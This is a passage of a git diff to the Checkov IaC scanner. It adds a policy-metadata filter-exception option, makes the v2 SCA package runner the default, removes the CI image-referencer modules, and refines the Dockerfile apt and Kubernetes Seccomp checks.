     try:
-        package_json = json.loads(file_content)
+        package_json = load_json_with_comments(file_content)
     except JSONDecodeError:
         logging.warning('unable to parse package json file')
         return output
diff --git a/checkov/common/util/consts.py b/checkov/common/util/consts.py
index 55f58f096c0..0693da12c4f 100644
--- a/checkov/common/util/consts.py
+++ b/checkov/common/util/consts.py
@@ -5,6 +5,7 @@
 START_LINE = '__startline__'
 END_LINE = '__endline__'
 LINE_FIELD_NAMES = {START_LINE, END_LINE}
+TRUE_AFTER_UNKNOWN = 'true_after_unknown'
 
 DEV_API_GET_HEADERS = {
     'Accept': 'application/json'
@@ -26,8 +27,6 @@
 
 MAX_IAC_FILE_SIZE = int(os.getenv('CHECKOV_MAX_IAC_FILE_SIZE', '50_000_000'))  # 50 MB is default limit
 
-CHECKOV_RUN_SCA_PACKAGE_SCAN_V2 = os.getenv('CHECKOV_RUN_SCA_PACKAGE_SCAN_V2', 'true').lower() == 'true'
-
 RESOURCE_ATTRIBUTES_TO_OMIT_UNIVERSAL_MASK = '*'
 
 S3_UPLOAD_DETAILS_MESSAGE = 'An error occurred uploading results to the platform. A details URL is not available for this run. ' \
diff --git a/checkov/common/util/env_vars_config.py b/checkov/common/util/env_vars_config.py
index a4e45be2048..8e6faa4981a 100644
--- a/checkov/common/util/env_vars_config.py
+++ b/checkov/common/util/env_vars_config.py
@@ -21,6 +21,7 @@ def __init__(self) -> None:
         self.CACHE_DIR = convert_str_to_bool(os.getenv("CKV_CACHE_DIR", str(Path(tempfile.gettempdir()) / "cache")))
         self.CHECK_FAIL_LEVEL = os.getenv("CHECKOV_CHECK_FAIL_LEVEL", CheckFailLevel.ERROR)
         self.CREATE_COMPLEX_VERTICES = convert_str_to_bool(os.getenv("CREATE_COMPLEX_VERTICES", True))
+        self.CHECKOV_ENABLE_DATAS_FOREACH_HANDLING = os.getenv('CHECKOV_ENABLE_DATAS_FOREACH_HANDLING', 'False')
         self.CREATE_EDGES = convert_str_to_bool(os.getenv("CREATE_EDGES", True))
         self.CREATE_MARKDOWN_HYPERLINKS = convert_str_to_bool(os.getenv("CHECKOV_CREATE_MARKDOWN_HYPERLINKS", False))
         self.CREATE_SCA_IMAGE_REPORTS_FOR_IR = convert_str_to_bool(
@@ -57,7 +58,6 @@ def __init__(self) -> None:
         self.RENDER_VARIABLES_ASYNC = convert_str_to_bool(os.getenv("RENDER_VARIABLES_ASYNC", False))
         self.RUN_IN_DOCKER = convert_str_to_bool(os.getenv("RUN_IN_DOCKER", False))
         self.REQUEST_MAX_TRIES = force_int(os.getenv("REQUEST_MAX_TRIES", 3))
-        self.RUN_SCA_PACKAGE_SCAN_V2 = convert_str_to_bool(os.getenv("CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", True))
         self.RUN_SECRETS_MULTIPROCESS = convert_str_to_bool(os.getenv("RUN_SECRETS_MULTIPROCESS", False))
         self.SLEEP_BETWEEN_REQUEST_TRIES = force_int(os.getenv("SLEEP_BETWEEN_REQUEST_TRIES", 1))
         self.SLS_FILE_MASK = os.getenv("CKV_SLS_FILE_MASK", "serverless.yml,serverless.yaml").split(",")
@@ -75,6 +75,7 @@ def __init__(self) -> None:
         # need to fix usage, because the env var value is set inside the code
         self.GITHUB_CONF_DIR_PATH = os.getenv("CKV_GITHUB_CONF_DIR_PATH")
         self.ENABLE_DEFINITION_KEY = os.getenv("ENABLE_DEFINITION_KEY", False)
+        self.CKV_SUPPORT_ALL_RESOURCE_TYPE = os.getenv('CKV_SUPPORT_ALL_RESOURCE_TYPE', False)
 
 
 env_vars_config = EnvVarsConfig()
diff --git a/checkov/common/util/ext_argument_parser.py b/checkov/common/util/ext_argument_parser.py
index f58b5efc714..7abe5f4ff62 100644
--- a/checkov/common/util/ext_argument_parser.py
+++ b/checkov/common/util/ext_argument_parser.py
@@ -163,14 +163,16 @@ def add_parser_args(self) -> None:
         self.add(
             "--external-checks-dir",
             action="append",
-            help="Directory for custom checks to be loaded. Can be repeated",
+            help="Directory for custom checks to be loaded. Can be repeated. Note that this will run Python code "
+                 'from the specified directory, so only use this option with trusted directories.',
         )
         self.add(
             "--external-checks-git",
             action="append",
-            help="Github url of external checks to be added.\n you can specify a subdirectory after a double-slash //."
-                 "\n possible to use ?ref=tags/tagName or ?ref=heads/branchName or ?ref=commit_id"
-                 "\n cannot be used together with --external-checks-dir",
+            help="GitHub url of external checks to be added. You can specify a subdirectory after a double-slash //."
+                 "It is ossible to use ?ref=tags/tagName or ?ref=heads/branchName or ?ref=commit_id and "
+                 "cannot be used together with --external-checks-dir. Note that this will run Python code "
+                 "from the specified directory, so only use this option with trusted repositories.",
         )
         self.add(
             "-l",
@@ -464,8 +466,19 @@ def add_parser_args(self) -> None:
         self.add(
             "--policy-metadata-filter",
             help="comma separated key:value string to filter policies based on Prisma Cloud policy metadata. "
+                 "When used with --policy-metadata-filter-exception, the exceptions override any policies selected as"
+                 "a result of the --policy-metadata-filter flag."
                  "See https://prisma.pan.dev/api/cloud/cspm/policy#operation/get-policy-filters-and-options for "
-                 "information on allowed filters. Format: policy.label=test,cloud.type=aws ",
+                 "information on allowed filters. Example: policy.label=label1,policy.label=label2,cloud.type=aws",
+            default=None,
+        )
+        self.add(
+            "--policy-metadata-filter-exception",
+            help="comma separated key:value string to exclude filtered policies based on Prisma Cloud policy metadata. "
+                 "When used with --policy-metadata-filter, the exceptions override any policies selected as"
+                 "a result of the --policy-metadata-filter flag."
+                 "See https://prisma.pan.dev/api/cloud/cspm/policy#operation/get-policy-filters-and-options for "
+                 "information on allowed filters. Example: policy.label=label1,policy.label=label2,cloud.type=aws",
             default=None,
         )
         self.add(
diff --git a/checkov/common/util/str_utils.py b/checkov/common/util/str_utils.py
index b340cb169e9..f47cd3059ec 100644
--- a/checkov/common/util/str_utils.py
+++ b/checkov/common/util/str_utils.py
@@ -11,6 +11,12 @@ def removeprefix(input_str: str, prefix: str) -> str:
     return input_str
 
 
+# in case of comparing paths from the BE and from the client, we have to make sure the structures are the same
+# e.g: in windows the seperator for the path is '\' while in linux/max it is '/'
+def align_path(path: str) -> str:
+    return path.replace('\\', '/')
+
+
 def convert_to_seconds(input_str: str) -> int:
     if re.search(seconds_per_unit_regex, input_str) is None:
         raise Exception(f"format error for input str, usage: {seconds_per_unit_regex}")
diff --git a/checkov/common/util/type_forcers.py b/checkov/common/util/type_forcers.py
index 371e53ba7cf..7db59879209 100644
--- a/checkov/common/util/type_forcers.py
+++ b/checkov/common/util/type_forcers.py
@@ -4,7 +4,7 @@
 import logging
 import typing
 from json import JSONDecodeError
-from typing import TypeVar, overload, Any, Dict
+from typing import TypeVar, overload, Any, Tuple, List
 
 import yaml
 
@@ -130,21 +130,26 @@ def convert_csv_string_arg_to_list(csv_string_arg: list[str] | str | None) -> li
         return csv_string_arg
 
 
-def convert_prisma_policy_filter_to_dict(filter_string: str) -> Dict[Any, Any]:
+def convert_prisma_policy_filter_to_params(filter_string: str) -> List[Tuple[str, str]]:
     """
-    Converts the filter string to a dict. For example:
+    Converts the filter string to a list of tuples. For example:
     'policy.label=label,cloud.type=aws' becomes -->
-    {'policy.label': 'label1', 'cloud.type': 'aws'}
-    Note that the API does not accept lists https://prisma.pan.dev/api/cloud/cspm/policy#operation/get-policies-v2
-    This is not allowed: policy.label=label1,label2
+    [('policy.label', 'label1'), ('cloud.type', 'aws')]
+
+    Multiple values for the same attribute, like policy.label, will be separate items in the tuple. For example,
+    'policy.label=label,policy.label=anotherlabel' becomes -->
+    [('policy.label', 'label1'), ('policy.label', 'anotherlabel')]
+
+    Note that the urllib3 library seems to work best with tuples only (not lists), so this result may need to be converted.
+    It is returned as a list so that it can be modified separately, and converted to a tuple only when ready
     """
-    filter_params = {}
+    filter_params: List[Tuple[str, str]] = []
     if isinstance(filter_string, str) and filter_string:
-        filter_string = "".join(filter_string.split())
-        try:
-            for f in filter_string.split(','):
+        for f in filter_string.split(','):
+            try:
                 f_name, f_value = f.split('=')
-                filter_params[f_name] = f_value
-        except (IndexError, ValueError) as e:
-            logging.debug(f"Invalid filter format: {e}")
+                filter_params.append((f_name.strip(), f_value.strip()))
+            except (IndexError, ValueError) as e:
+                logging.debug(f"Invalid filter format: {e}")
+
     return filter_params
diff --git a/checkov/dockerfile/checks/RunUsingAPT.py b/checkov/dockerfile/checks/RunUsingAPT.py
index f561a7d109e..5b07bacfcf5 100644
--- a/checkov/dockerfile/checks/RunUsingAPT.py
+++ b/checkov/dockerfile/checks/RunUsingAPT.py
@@ -23,8 +23,12 @@ def __init__(self) -> None:
     def scan_resource_conf(self, conf: list[_Instruction]) -> tuple[CheckResult, list[_Instruction] | None]:
         for run in conf:
             content = run["content"]
-            if " apt " in content:
-                return CheckResult.FAILED, [run]
+            # Split the content by '&&' and strip any leading/trailing spaces from each segment
+            commands = [cmd.strip() for cmd in content.split("&&")]
+            for command in commands:
+                # Check if 'apt' is used and it's not part of a 'rm' command
+                if " apt " in command and "rm" not in command:
+                    return CheckResult.FAILED, [run]
         return CheckResult.PASSED, None
 
 
diff --git a/checkov/docs_generator.py b/checkov/docs_generator.py
index 27042664467..dc04fea757d 100644
--- a/checkov/docs_generator.py
+++ b/checkov/docs_generator.py
@@ -58,11 +58,13 @@ def get_compare_key(c: list[str] | tuple[str, ...]) -> list[tuple[str, str, int,
 
 
 def print_checks(frameworks: Optional[List[str]] = None, use_bc_ids: bool = False,
-                 include_all_checkov_policies: bool = True, filtered_policy_ids: Optional[List[str]] = None) -> None:
+                 include_all_checkov_policies: bool = True, filtered_policy_ids: Optional[List[str]] = None,
+                 filtered_exception_policy_ids: Optional[List[str]] = None) -> None:
     framework_list = frameworks if frameworks else ["all"]
     printable_checks_list = get_checks(framework_list, use_bc_ids=use_bc_ids,
                                        include_all_checkov_policies=include_all_checkov_policies,
-                                       filtered_policy_ids=filtered_policy_ids or [])
+                                       filtered_policy_ids=filtered_policy_ids or [],
+                                       filtered_exception_policy_ids=filtered_exception_policy_ids or [])
     print(
         tabulate(printable_checks_list, headers=["Id", "Type", "Entity", "Policy", "IaC", "Resource Link"], tablefmt="github",
                  showindex=True))
@@ -83,11 +85,15 @@ def get_check_link(absolute_path: str) -> str:
 
 
 def get_checks(frameworks: Optional[List[str]] = None, use_bc_ids: bool = False,
-               include_all_checkov_policies: bool = True, filtered_policy_ids: Optional[List[str]] = None) -> List[Tuple[str, str, int, int, str, str]]:
+               include_all_checkov_policies: bool = True, filtered_policy_ids: Optional[List[str]] = None,
+               filtered_exception_policy_ids: Optional[List[str]] = None) -> List[Tuple[str, str, int, int, str, str]]:
     framework_list = frameworks if frameworks else ["all"]
     printable_checks_list: list[tuple[str, str, str, str, str, str]] = []
     filtered_policy_ids = filtered_policy_ids or []
-    runner_filter = RunnerFilter(include_all_checkov_policies=include_all_checkov_policies, filtered_policy_ids=filtered_policy_ids)
+    filtered_exception_policy_ids = filtered_exception_policy_ids or []
+    runner_filter = RunnerFilter(include_all_checkov_policies=include_all_checkov_policies,
+                                 filtered_policy_ids=filtered_policy_ids,
+                                 filtered_exception_policy_ids=filtered_exception_policy_ids)
 
     def add_from_repository(registry: Union[BaseCheckRegistry, BaseGraphRegistry], checked_type: str, iac: str,
                             runner_filter: RunnerFilter = runner_filter) -> None:
diff --git a/checkov/github_actions/image_referencer/manager.py b/checkov/github_actions/image_referencer/manager.py
deleted file mode 100644
index 822287da929..00000000000
--- a/checkov/github_actions/image_referencer/manager.py
+++ /dev/null
@@ -1,15 +0,0 @@
-from __future__ import annotations
-from typing import Any
-
-from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager
-from checkov.github_actions.image_referencer.provider import GithubActionProvider
-
-
-class GithubActionsImageReferencerManager(WorkflowImageReferencerManager):
-    __slots__ = ("workflow_config", "file_path", "workflow_line_numbers", "provider")
-
-    def __init__(self, workflow_config: dict[str, Any], file_path: str, workflow_line_numbers: list[tuple[int, str]]):
-        provider = GithubActionProvider(workflow_config=workflow_config, file_path=file_path,
-                                        workflow_line_numbers=workflow_line_numbers)
-        super().__init__(workflow_config, file_path, provider)
-        self.workflow_line_numbers = workflow_line_numbers
diff --git a/checkov/github_actions/image_referencer/provider.py b/checkov/github_actions/image_referencer/provider.py
deleted file mode 100644
index e2b4a8e04f8..00000000000
--- a/checkov/github_actions/image_referencer/provider.py
+++ /dev/null
@@ -1,66 +0,0 @@
-from __future__ import annotations
-from typing import Any
-
-from checkov.common.images.image_referencer import Image
-from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider
-from checkov.common.util.consts import START_LINE, END_LINE
-
-
-class GithubActionProvider(WorkflowImageReferencerProvider):
-
-    def __init__(self, workflow_config: dict[str, Any], file_path: str, workflow_line_numbers: list[tuple[int, str]]):
-        super().__init__(workflow_config, file_path)
-        self.workflow_line_numbers = workflow_line_numbers
-
-    def generate_resource_key(self, start_line: int, end_line: int) -> str:
-        """
-        Generate resource key without the previous format of key (needed in get_resource)
-        """
-        jobs_dict: dict[str, Any] = self.workflow_config.get("jobs", {})
-        for job_name, job in jobs_dict.items():
-            if not isinstance(job, dict):
-                continue
-
-            if job[START_LINE] <= start_line <= end_line <= job[END_LINE]:
-                return f'jobs({job_name})'
-
-        return ''
-
-    def extract_images_from_workflow(self) -> list[Image]:
-        images: list[Image] = []
-
-        if not isinstance(self.workflow_config, dict):
-            # make type checking happy
-            return images
-
-        jobs = self.workflow_config.get("jobs", {})
-        for job_object in jobs.values():
-            if isinstance(job_object, dict):
-                container = job_object.get("container", {})
-                image = None
-                start_line = 0
-                end_line = 0
-
-                if isinstance(container, dict):
-                    image = container.get("image", "")
-                    start_line, end_line = container.get(START_LINE, 0), container.get(END_LINE, 0)
-                elif isinstance(container, str):
-                    image = container
-                    line_to_line_numbers = self.workflow_line_numbers[job_object[START_LINE] - 1:]
-                    image_line = next((line_number for line_number, line in line_to_line_numbers if image in line), None)
-                    if not image_line:
-                        continue
-                    start_line = image_line
-                    end_line = start_line + 1
-
-                if image:
-                    image_obj = Image(
-                        file_path=self.file_path[self.file_path.index('/.github'):],
-                        name=image,
-                        start_line=start_line,
-                        end_line=end_line,
-                        related_resource_id=self.generate_resource_key(start_line, end_line)
-                    )
-                    images.append(image_obj)
-
-        return images
diff --git a/checkov/github_actions/runner.py b/checkov/github_actions/runner.py
index c0d13304225..98e1fb8fbeb 100644
--- a/checkov/github_actions/runner.py
+++ b/checkov/github_actions/runner.py
@@ -1,25 +1,19 @@
 from __future__ import annotations
 
 import logging
-import os
 from collections.abc import Iterable
 from typing import TYPE_CHECKING, Any
 
 import yaml
 
+import checkov.common.parsers.yaml.loader as loader
+from checkov.common.bridgecrew.check_type import CheckType
 from checkov.common.graph.graph_builder.consts import GraphSource
 from checkov.common.output.report import Report
-from checkov.github_actions.image_referencer.manager import GithubActionsImageReferencerManager
+from checkov.github_actions.checks.registry import registry
 from checkov.github_actions.graph_builder.local_graph import GitHubActionsLocalGraph
 from checkov.github_actions.utils import is_schema_valid, is_workflow_file
-
 from checkov.runner_filter import RunnerFilter
-
-import checkov.common.parsers.yaml.loader as loader
-from checkov.common.images.image_referencer import Image, ImageReferencerMixin
-from checkov.common.bridgecrew.check_type import CheckType
-from checkov.common.util.type_forcers import force_dict
-from checkov.github_actions.checks.registry import registry
 from checkov.yaml_doc.runner import Runner as YamlRunner
 
 if TYPE_CHECKING:
@@ -27,10 +21,9 @@
     from checkov.common.typing import LibraryGraphConnector
     from checkov.common.runners.graph_builder.local_graph import ObjectLocalGraph
     from checkov.common.runners.graph_manager import ObjectGraphManager
-    from networkx import DiGraph
 
 
-class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner):
+class Runner(YamlRunner):
     check_type = CheckType.GITHUB_ACTIONS  # noqa: CCE003  # a static attribute
 
     def __init__(
@@ -66,7 +59,11 @@ def _parse_file(f: str, file_content: str | None = None) -> \
 
             if not file_content:
                 with open(f, 'r') as f_obj:
-                    file_content = f_obj.read()
+                    try:
+                        file_content = f_obj.read()
+                    except Exception as e:
+                        logging.warning(f'Fail to read file {f}. error: {e}')
+                        return None
 
             if all(map(is_schema_valid, yaml.load_all(file_content, Loader=loader.SafeLineLoaderGhaSchema))):  # nosec
                 return entity_schema
@@ -117,43 +114,8 @@ def run(
         runner_filter = runner_filter or RunnerFilter()
         report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir,
                              files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments)
-        if runner_filter.run_image_referencer:
-            if files:
-                # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form
-                root_folder = os.path.split(os.path.commonprefix(files))[0]
-
-            image_report = self.check_container_image_references(
-                graph_connector=None,
-                root_path=root_folder,
-                runner_filter=runner_filter,
-                definitions=self.definitions,
-                definitions_raw=self.definitions_raw
-            )
-
-            if image_report:
-                if isinstance(report, list):
-                    return [*report, image_report]
-                return [report, image_report]
-
         return report
 
-    def extract_images(
-        self, graph_connector: DiGraph | None = None,
-            definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None,
-            definitions_raw: dict[str, list[tuple[int, str]]] | None = None
-    ) -> list[Image]:
-        images: list[Image] = []
-        if not definitions or not definitions_raw:
-            return images
-
-        for file, config in definitions.items():
-            _config = force_dict(config) or {}
-            manager = GithubActionsImageReferencerManager(workflow_config=_config, file_path=file,
-                                                          workflow_line_numbers=definitions_raw[file])
-            images.extend(manager.extract_images_from_workflow())
-
-        return images
-
     def populate_metadata_dict(self) -> None:
         if isinstance(self.definitions, dict):
             # populate gha metadata dict
diff --git a/checkov/gitlab_ci/image_referencer/manager.py b/checkov/gitlab_ci/image_referencer/manager.py
deleted file mode 100644
index 28abfd40ab1..00000000000
--- a/checkov/gitlab_ci/image_referencer/manager.py
+++ /dev/null
@@ -1,13 +0,0 @@
-from __future__ import annotations
-
-from typing import Any
-
-from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager
-from checkov.gitlab_ci.image_referencer.provider import GitlabCiProvider
-
-
-class GitlabCiImageReferencerManager(WorkflowImageReferencerManager):
-
-    def __init__(self, workflow_config: dict[str, Any], file_path: str):
-        provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path)
-        super().__init__(workflow_config, file_path, provider)
diff --git a/checkov/gitlab_ci/image_referencer/provider.py b/checkov/gitlab_ci/image_referencer/provider.py
deleted file mode 100644
index 743ae81197f..00000000000
--- a/checkov/gitlab_ci/image_referencer/provider.py
+++ /dev/null
@@ -1,62 +0,0 @@
-from __future__ import annotations
-
-from typing import Any
-
-from checkov.common.images.image_referencer import Image
-from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider
-from checkov.gitlab_ci.common.resource_id_utils import generate_resource_key_recursive
-
-
-class GitlabCiProvider(WorkflowImageReferencerProvider):
-
-    def __init__(self, workflow_config: dict[str, Any], file_path: str):
-        super().__init__(workflow_config, file_path)
-        self.supported_keys = ("image", "services")
-
-    def extract_images_from_workflow(self) -> list[Image]:
-        images = []
-        for job_object in self.workflow_config.values():
-            if isinstance(job_object, dict):
-                start_line, end_line = GitlabCiProvider._get_start_end_lines(job_object)
-                for key, subjob in job_object.items():
-                    if key in self.supported_keys:
-                        image_name = ""
-                        if isinstance(subjob, dict):
-                            if 'name' not in subjob:
-                                continue
-                            start_line, end_line = GitlabCiProvider._get_start_end_lines(subjob)
-                            image_name = subjob['name']
-                        elif isinstance(subjob, str):
-                            image_name = subjob
-                        elif isinstance(subjob, list):
-                            for service in subjob:
-                                if isinstance(service, dict):
-                                    start_line, end_line = GitlabCiProvider._get_start_end_lines(service)
-                                    image_name = service['name']
-                                elif isinstance(service, str):
-                                    image_name = service
-                                if image_name:
-                                    image_obj = Image(
-                                        file_path=self.file_path,
-                                        name=image_name,
-                                        start_line=start_line,
-                                        end_line=end_line,
-                                        related_resource_id=generate_resource_key_recursive(conf=self.workflow_config,
-                                                                                            key='',
-                                                                                            start_line=start_line,
-                                                                                            end_line=end_line)
-                                    )
-                                    images.append(image_obj)
-                                    image_name = ""
-                        if image_name:
-                            image_obj = Image(
-                                file_path=self.file_path,
-                                name=image_name,
-                                start_line=start_line,
-                                end_line=end_line,
-                                related_resource_id=generate_resource_key_recursive(conf=self.workflow_config,
-                                                                                    key='', start_line=start_line,
-                                                                                    end_line=end_line)
-                            )
-                            images.append(image_obj)
-        return list(set(images))
diff --git a/checkov/gitlab_ci/runner.py b/checkov/gitlab_ci/runner.py
index a58acd9d179..d680383cbb4 100644
--- a/checkov/gitlab_ci/runner.py
+++ b/checkov/gitlab_ci/runner.py
@@ -1,27 +1,21 @@
 from __future__ import annotations
 
-import os
 from typing import TYPE_CHECKING, Any
 
+from checkov.common.bridgecrew.check_type import CheckType
 from checkov.common.output.report import Report
 from checkov.common.util.type_forcers import force_dict
+from checkov.gitlab_ci.checks.registry import registry
 from checkov.gitlab_ci.common.resource_id_utils import generate_resource_key_recursive
-
 from checkov.runner_filter import RunnerFilter
-
-from checkov.common.images.image_referencer import Image, ImageReferencerMixin
-from checkov.common.bridgecrew.check_type import CheckType
-from checkov.gitlab_ci.checks.registry import registry
-from checkov.gitlab_ci.image_referencer.manager import GitlabCiImageReferencerManager
 from checkov.yaml_doc.runner import Runner as YamlRunner
 
 if TYPE_CHECKING:
     from checkov.common.checks.base_check_registry import BaseCheckRegistry
     from collections.abc import Iterable
-    from networkx import DiGraph
 
 
-class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner):
+class Runner(YamlRunner):
     check_type = CheckType.GITLAB_CI  # noqa: CCE003  # a static attribute
 
     def require_external_checks(self) -> bool:
@@ -69,38 +63,4 @@ def run(
         runner_filter = runner_filter or RunnerFilter()
         report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir,
                              files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments)
-        if runner_filter.run_image_referencer:
-            if files:
-                # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form
-                root_folder = os.path.split(os.path.commonprefix(files))[0]
-
-            image_report = self.check_container_image_references(
-                graph_connector=None,
-                root_path=root_folder,
-                runner_filter=runner_filter,
-                definitions=self.definitions
-            )
-
-            if image_report:
-                return [report, image_report]  # type:ignore[list-item]  # report can only be of type Report, not a list
-
         return report
-
-    def extract_images(
-        self,
-        graph_connector: DiGraph | None = None,
-        definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None,
-        definitions_raw: dict[str, list[tuple[int, str]]] | None = None
-    ) -> list[Image]:
-        images: list[Image] = []
-        if not definitions:
-            return images
-
-        for file, config in definitions.items():
-            if isinstance(config, list):
-                continue
-
-            manager = GitlabCiImageReferencerManager(workflow_config=config, file_path=file)
-            images.extend(manager.extract_images_from_workflow())
-
-        return images
diff --git a/checkov/kubernetes/checks/resource/k8s/Seccomp.py b/checkov/kubernetes/checks/resource/k8s/Seccomp.py
index cf6745e1ef7..a6ac1486d82 100644
--- a/checkov/kubernetes/checks/resource/k8s/Seccomp.py
+++ b/checkov/kubernetes/checks/resource/k8s/Seccomp.py
@@ -52,21 +52,43 @@ def scan_spec_conf(self, conf: dict[str, Any]) -> CheckResult:
             if security_profile:
                 return CheckResult.PASSED if security_profile == 'RuntimeDefault' else CheckResult.FAILED
 
+            if "spec" in conf and isinstance(conf["spec"], dict):
+                template_spec = conf["spec"].get("template", {})
+                if isinstance(template_spec, dict):
+                    template_spec = template_spec.get("spec", {})
+                    if isinstance(template_spec, dict):
+                        containers = template_spec.get("containers")
+                        if containers:
+                            containers = force_list(containers)
+                            num_containers = len(containers)
+                            passed_containers = 0
+                            for container in containers:
+                                security_profile = find_in_dict(container, "securityContext/seccompProfile/type")
+                                if security_profile:
+                                    if security_profile == "RuntimeDefault":
+                                        passed_containers += 1
+                                    else:
+                                        return CheckResult.FAILED
+                            if passed_containers == num_containers:
+                                return CheckResult.PASSED
+
             metadata = find_in_dict(input_dict=conf, key_path="spec/template/metadata")
             if not metadata and "metadata" in conf:
                 metadata = conf["metadata"]
         elif conf['kind'] == 'CronJob':
             inner_template = find_in_dict(input_dict=conf, key_path="spec/jobTemplate/spec/template")
             if inner_template and isinstance(inner_template, dict):
-                if "metadata" in inner_template:
-                    metadata = inner_template["metadata"]
-                elif "spec" in inner_template:
+                if "spec" in inner_template:
                     inner_spec = inner_template["spec"]
                     if "metadata" in inner_spec:
                         metadata = inner_spec["metadata"]
                     elif "securityContext" in inner_spec:
                         security_profile = inner_spec["securityContext"].get("seccompProfile", {}).get("type")
-                        return CheckResult.PASSED if security_profile == 'RuntimeDefault' else CheckResult.FAILED
+                        if security_profile == 'RuntimeDefault':
+                            return CheckResult.PASSED
+                if "metadata" in inner_template:
+                    metadata = inner_template["metadata"]
+
         else:
             inner_metadata = find_in_dict(input_dict=conf, key_path="spec/template/metadata")
             metadata = inner_metadata if inner_metadata else metadata
diff --git a/checkov/main.py b/checkov/main.py
index 159686b0203..b2c5a00e047 100755
--- a/checkov/main.py
+++ b/checkov/main.py
@@ -31,7 +31,7 @@
 from checkov.cloudformation.runner import Runner as cfn_runner
 from checkov.common.bridgecrew.bc_source import SourceTypes, BCSourceType, get_source_type, SourceType
 from checkov.common.bridgecrew.check_type import checkov_runners, CheckType
-from checkov.common.bridgecrew.platform_errors import ModuleNotEnabledError
+from checkov.common.bridgecrew.platform_errors import ModuleNotEnabledError, PlatformConnectionError
 from checkov.common.bridgecrew.integration_features.features.custom_policies_integration import \
     integration as custom_policies_integration
 from checkov.common.bridgecrew.integration_features.features.licensing_integration import \
@@ -55,7 +55,6 @@
 from checkov.common.util import prompt
 from checkov.common.util.banner import banner as checkov_banner, tool as checkov_tool
 from checkov.common.util.config_utils import get_default_config_paths
-from checkov.common.util.consts import CHECKOV_RUN_SCA_PACKAGE_SCAN_V2
 from checkov.common.util.ext_argument_parser import ExtArgumentParser, flatten_csv
 from checkov.common.util.runner_dependency_handler import RunnerDependencyHandler
 from checkov.common.util.type_forcers import convert_str_to_bool
@@ -77,7 +76,6 @@
 from checkov.sast.report import SastData, SastReport
 from checkov.sast.runner import Runner as sast_runner
 from checkov.sca_image.runner import Runner as sca_image_runner
-from checkov.sca_package.runner import Runner as sca_package_runner
 from checkov.sca_package_2.runner import Runner as sca_package_runner_2
 from checkov.secrets.runner import Runner as secrets_runner
 from checkov.serverless.runner import Runner as sls_runner
@@ -122,6 +120,7 @@
     bicep_runner(),
     openapi_runner(),
     sca_image_runner(),
+    sca_package_runner_2(),
     argo_workflows_runner(),
     circleci_pipelines_runner(),
     azure_pipelines_runner(),
@@ -191,9 +190,9 @@ def normalize_config(self) -> None:
         if self.config.bc_api_key and not self.config.repo_id and not self.config.list:
             self.parser.error('--repo-id is required when using a platform API key')
 
-        if self.config.policy_metadata_filter and not (self.config.bc_api_key and self.config.prisma_api_url):
+        if (self.config.policy_metadata_filter or self.config.policy_metadata_filter_exception) and not (self.config.bc_api_key and self.config.prisma_api_url):
             logger.warning(
-                '--policy-metadata-filter flag was used without a Prisma Cloud API key. Policy filtering will be skipped.'
+                '--policy-metadata-filter or --policy-metadata-filter-exception flag was used without a Prisma Cloud API key. Policy filtering will be skipped.'
             )
 
         logging.debug('Normalizing --framework')
@@ -348,11 +347,6 @@ def run(self, banner: str = checkov_banner, tool: str = checkov_tool, source_typ
                 logger.debug('Using --list; setting source to DISABLED')
                 source = SourceTypes[BCSourceType.DISABLED]
 
-            if CHECKOV_RUN_SCA_PACKAGE_SCAN_V2:
-                self.runners.append(sca_package_runner_2())
-            else:
-                self.runners.append(sca_package_runner())
-
             if outer_registry:
                 runner_registry = outer_registry
                 runner_registry.runner_filter = runner_filter
@@ -408,6 +402,8 @@ def run(self, banner: str = checkov_banner, tool: str = checkov_tool, source_typ
 
                 except MaxRetryError:
                     self.exit_run()
+                except PlatformConnectionError:
+                    self.exit_run()
                 except Exception:
                     if bc_integration.prisma_api_url:
                         message = 'An error occurred setting up the Prisma Cloud platform integration. ' \
@@ -466,30 +462,28 @@ def run(self, banner: str = checkov_banner, tool: str = checkov_tool, source_typ
                     if removed_check_types:
                         logger.warning(f"Following runners won't run as they are not supported for on-premises integrations: {removed_check_types}")
 
-            bc_integration.get_prisma_build_policies(self.config.policy_metadata_filter)
+            bc_integration.get_prisma_build_policies(self.config.policy_metadata_filter, self.config.policy_metadata_filter_exception)
 
             # set config to make it usable inside the integration features
             integration_feature_registry.config = self.config
             integration_feature_registry.run_pre_scan()
 
+            # assign policies suppression to runner_filter
             policy_level_suppression = suppressions_integration.get_policy_level_suppressions()
-            bc_cloned_checks = custom_policies_integration.bc_cloned_checks
-            runner_filter.bc_cloned_checks = bc_cloned_checks
+            runner_filter.bc_cloned_checks = custom_policies_integration.bc_cloned_checks
             custom_policies_integration.policy_level_suppression = list(policy_level_suppression.keys())
+            runner_filter.set_suppressed_policies(list(policy_level_suppression.values()))
 
             if any(framework in runner_filter.framework for framework in ("all", CheckType.SCA_IMAGE)):
                 # only run image referencer, when sca_image framework is enabled
                 runner_filter.run_image_referencer = licensing_integration.should_run_image_referencer()
 
             runner_filter.filtered_policy_ids = policy_metadata_integration.filtered_policy_ids
+            runner_filter.filtered_exception_policy_ids = policy_metadata_integration.filtered_exception_policy_ids
             logger.debug(f"Filtered list of policies: {runner_filter.filtered_policy_ids}")
+            logger.debug(f"Filtered excluded list of policies: {runner_filter.filtered_exception_policy_ids}")
 
             runner_filter.excluded_paths = runner_filter.excluded_paths + list(repo_config_integration.skip_paths)
-            policy_level_suppression = suppressions_integration.get_policy_level_suppressions()
-            bc_cloned_checks = custom_policies_integration.bc_cloned_checks
-            runner_filter.bc_cloned_checks = bc_cloned_checks
-            custom_policies_integration.policy_level_suppression = list(policy_level_suppression.keys())
